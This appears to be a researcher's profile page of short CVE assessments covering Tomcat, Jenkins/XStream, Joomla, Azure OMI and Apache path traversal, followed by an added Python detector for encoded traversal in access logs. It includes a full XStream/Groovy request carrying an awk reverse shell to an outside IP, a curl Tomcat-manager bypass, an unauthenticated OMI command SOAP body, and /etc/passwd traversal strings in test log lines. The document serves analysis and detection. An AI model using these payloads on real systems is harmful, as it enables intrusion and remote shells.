noraj (85)

Last Login: July 30, 2023
Assessments
36
Score
85

noraj's Latest (20) Contributions

1
Ratings
Technical Analysis

The XXE is in a function (Xml::parse) that is part of the core library but is not used directly in the CMS. So to be vulnerable, one has to have made a custom page or installed an extension using this vulnerable function.
Else it’s pretty handy and is present in nearly all versions of the CMS until the patch.

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

Versions of Dell EMC iDRAC8 or Dell EMC iDRAC9 prior to 2.83.83.83/5.10.30.00 are vulnerable to this. Dell advisory.

1
Ratings
Technical Analysis

No known public exploit.

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very Low
Technical Analysis

No known public exploit.

1
Ratings
Technical Analysis

It should be easy to exploit, but there is no known public exploit.

1
Ratings
Technical Analysis

It’s hard to find a SH4 architecture gcc compilation toolchain outside of Debian / Ubuntu. Cross compilation makes it difficult to compile the payload.

1
Ratings
  • Attacker Value
    High
  • Exploitability
    High
Technical Analysis

Useful to access the Tomcat manager, which is normally exposed only on localhost, e.g.

curl http://example.org/..\;/manager/html --path-as-is
3
Ratings
Technical Analysis

It’s easy to weaponize, even manually, but there are dozens of exploits available. There is a TryHackMe room about CVE-2022-26134 to practice in a lab environment.

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Despite the CVE being registered for WordPress, FCKeditor is embedded in many CMSs or custom applications and as such can impact more applications. However, FCKeditor provides connectors for ASP, PHP, etc. but not for JSP, for example. So a Java app using FCKeditor may not be vulnerable even with a vulnerable FCKeditor.

1
Ratings
Technical Analysis

There are at least two ways to achieve RCE.

Vector n°1

It leaks the MySQL credentials; in default and most common configurations MySQL is exposed only on 127.0.0.1, which makes the attack ineffective. But if the database is exposed publicly, the attacker can change the Joomla! Super User’s password. The attacker then logs in to the administrative web interface and modifies a template to include a webshell or installs a malicious plugin.

Vector n°2

It leaks the Joomla user database (usernames, emails, assigned group). The attacker can target a Super User and try brute force or credential stuffing, then follow the previously showcased paths to code execution.

1
Ratings
Technical Analysis

It has been proven to work well on production domains (cf. https://twitter.com/an0n_r0/status/1589405818885398528). kpasswd support is being implemented in impacket and the vuln will be exploitable with ticketer.
Note: this vulnerability concerns Samba AD, not MS AD.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

This vulnerability is old now and targets old versions of Rails. But if you face such an app it’s really easy to get RCE using an existing PoC. However, editing the YAML manually can be difficult because it’s very whitespace-sensitive.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

It’s easy to get RCE with a Groovy payload. Your code will be executed even if you receive an HTTP 500 error.

Example of request / payload:

POST /createItem?name=example HTTP/1.1
Host: example.org
Content-Length: 689
Content-Type: application/xml;
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando"/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>awk</string>
                <string>'BEGIN {s = "/inet/tcp/0/192.168.1.14/9999"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'</string>
                <string>/dev/null</string>
              </command>
            </owner>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>
1
Ratings
Technical Analysis

The only file you can rely on for detection is /WEB-INF/web.xml, but to read anything else you’ll have to know the directory structure, which is unlikely when you audit a client’s infrastructure. To achieve RCE you’ll need a file upload, which is also less likely. In many real-life cases it may end up not being useful beyond proving the vulnerability exists.
There is still some chance you can read /RELEASE-NOTES.txt if you don’t have another means of knowing the version used.

If the application is deployed under an unguessable path it’s likely you won’t be able to go further, but if you can reach the app and browse it, you may be able to work out paths and try to read the source code of the application.

1
Ratings
Technical Analysis

IBM Integrated Management Module (IMM) has some default admin credentials (USERID / PASSW0RD). The default credentials work on the WebUI as well as on telnet and SSH, which are accessible by default. The vulnerability allows injecting system commands. However, the big tradeoff is that the exploit is not public.

2
Ratings
Technical Analysis

It gives the GLPI version, the list of all plugins and their versions, and some system info like the database used and its version, sometimes the webserver engine, the PHP version and the list of all PHP modules loaded, the OS distro and version, and the kernel name and version.

2
Ratings
Technical Analysis

iTop is a common ITIL software; it gives access to tons of information on the IT department (IP ranges, machine information, support tickets, usernames), it’s often plugged into AD LDAP, etc. Having RCE on the server allows reading configuration files containing LDAP service account credentials, retrieving local users’ password hashes for password spraying, obtaining web admin credentials to access the information gold mine, etc.
Any low-privilege account will work for the exploit; in general every employee has an account.

1
Ratings
Technical Analysis

It exposes PII (Personally Identifiable Information) from events registered in the calendar, but also usernames and password hashes for offline cracking.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

HackTricks

The OMI server receives configuration management messages via the /wsman endpoint. Typically, an Authentication header is passed along with the message and the OMI server will ensure the client is authorized to communicate. In this case the vulnerability is that when there is no Authentication header the server incorrectly accepts the message and executes the instruction as the root user.

By posting an “ExecuteShellCommand” SOAP payload to the server with no Authentication header specified, it will execute the command as root.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
   ...
   <s:Body>
      <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
         <p:command>id</p:command>
         <p:timeout>0</p:timeout>
      </p:ExecuteShellCommand_INPUT>
   </s:Body>
</s:Envelope>
1
Ratings
Technical Analysis

Qualys says:

CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.

The attack in 2.4.49 initially encoded the second dot (.) to %2e and the same was double URL encoded into %%32%65 for version 2.4.50
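Two of the assessments above hinge on how a server normalises a request path before checking it: the Tomcat manager one (a `..\;` segment, i.e. a backslash separator plus a `;` path parameter) and the Apache 2.4.49/2.4.50 one (the second dot single-encoded as `%2e`, then double-encoded as `%%32%65`). The detector below, an added example that is not part of noraj's assessments or of any project's code, applies those same normalisations to paths pulled from access-log lines and reports which trick was used and where the request actually lands. The log lines are constructed for the example, and the function names (`percent_decode`, `analyse_path`, `scan_access_log`) are mine.

```python
"""Flag percent-encoded, double-encoded and path-parameter traversal in
request paths taken from web server / reverse proxy access logs.

Added example, not code from the page: the log lines are constructed and the
function names are the author's own choice.
"""
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # "%%32%65" -> "%2e" -> "." takes two rounds; cap to avoid loops

# Constructed combined-log-format lines for a local test; not real traffic.
LOG_LINES = [
    '10.0.0.5 - - [10/Oct/2021:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    # single URL encoding of the second dot (the 2.4.49 shape)
    '10.0.0.5 - - [10/Oct/2021:12:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199',
    # double URL encoding of the same dot (the 2.4.50 shape)
    '10.0.0.5 - - [10/Oct/2021:12:00:02 +0000] "GET /cgi-bin/.%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 200 1890',
    # backslash plus ';' path parameter hiding a traversal towards the Tomcat manager
    r'10.0.0.5 - - [10/Oct/2021:12:00:03 +0000] "GET /..\;/manager/html HTTP/1.1" 200 4401',
]

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def percent_decode(path):
    """Percent-decode repeatedly until the text stops changing.

    Returns (decoded, rounds). Two rounds means the path was double encoded,
    which is how "%%32%65" hides a "." from a single-pass decoder.
    """
    current, rounds = path, 0
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def normalise_segments(decoded):
    """Split the way a lenient container does: a backslash counts as a
    separator and anything after ';' in a segment is a path parameter."""
    return [seg.split(";", 1)[0] for seg in decoded.replace("\\", "/").split("/")]


def analyse_path(raw_path):
    """Return the decoded path, where a naive normaliser would land, and the
    list of suspicious features found (empty for a clean path)."""
    decoded, rounds = percent_decode(raw_path)
    segments = normalise_segments(decoded)
    findings = []
    if rounds >= 2:
        findings.append("double-encoding")
    if ".." in segments:
        findings.append("dot-dot-traversal")
    if ";" in decoded:
        findings.append("path-parameter")
    if "\\" in decoded:
        findings.append("backslash-separator")
    # Resolve ".." segments to show the path the request actually reaches.
    resolved = []
    for seg in segments:
        if seg == "..":
            if resolved:
                resolved.pop()
        elif seg not in ("", "."):
            resolved.append(seg)
    return {"raw": raw_path, "decoded": decoded,
            "resolved": "/" + "/".join(resolved), "findings": findings}


def scan_access_log(lines):
    """Return one analysis per log line whose request path shows any finding."""
    hits = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        result = analyse_path(match.group(1))
        if result["findings"]:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(LOG_LINES):
        print(hit["raw"], "->", hit["resolved"], hit["findings"])
```

The decode loop is the important design choice: a single `unquote` turns `%%32%65` into `%2e`, which contains no `..` and would pass a one-pass filter, exactly the gap the 2.4.50 fix left. Decoding until the string is stable (with a small cap) catches any depth of encoding, and reporting the number of rounds separates a plain encoded request from a deliberately double-encoded one.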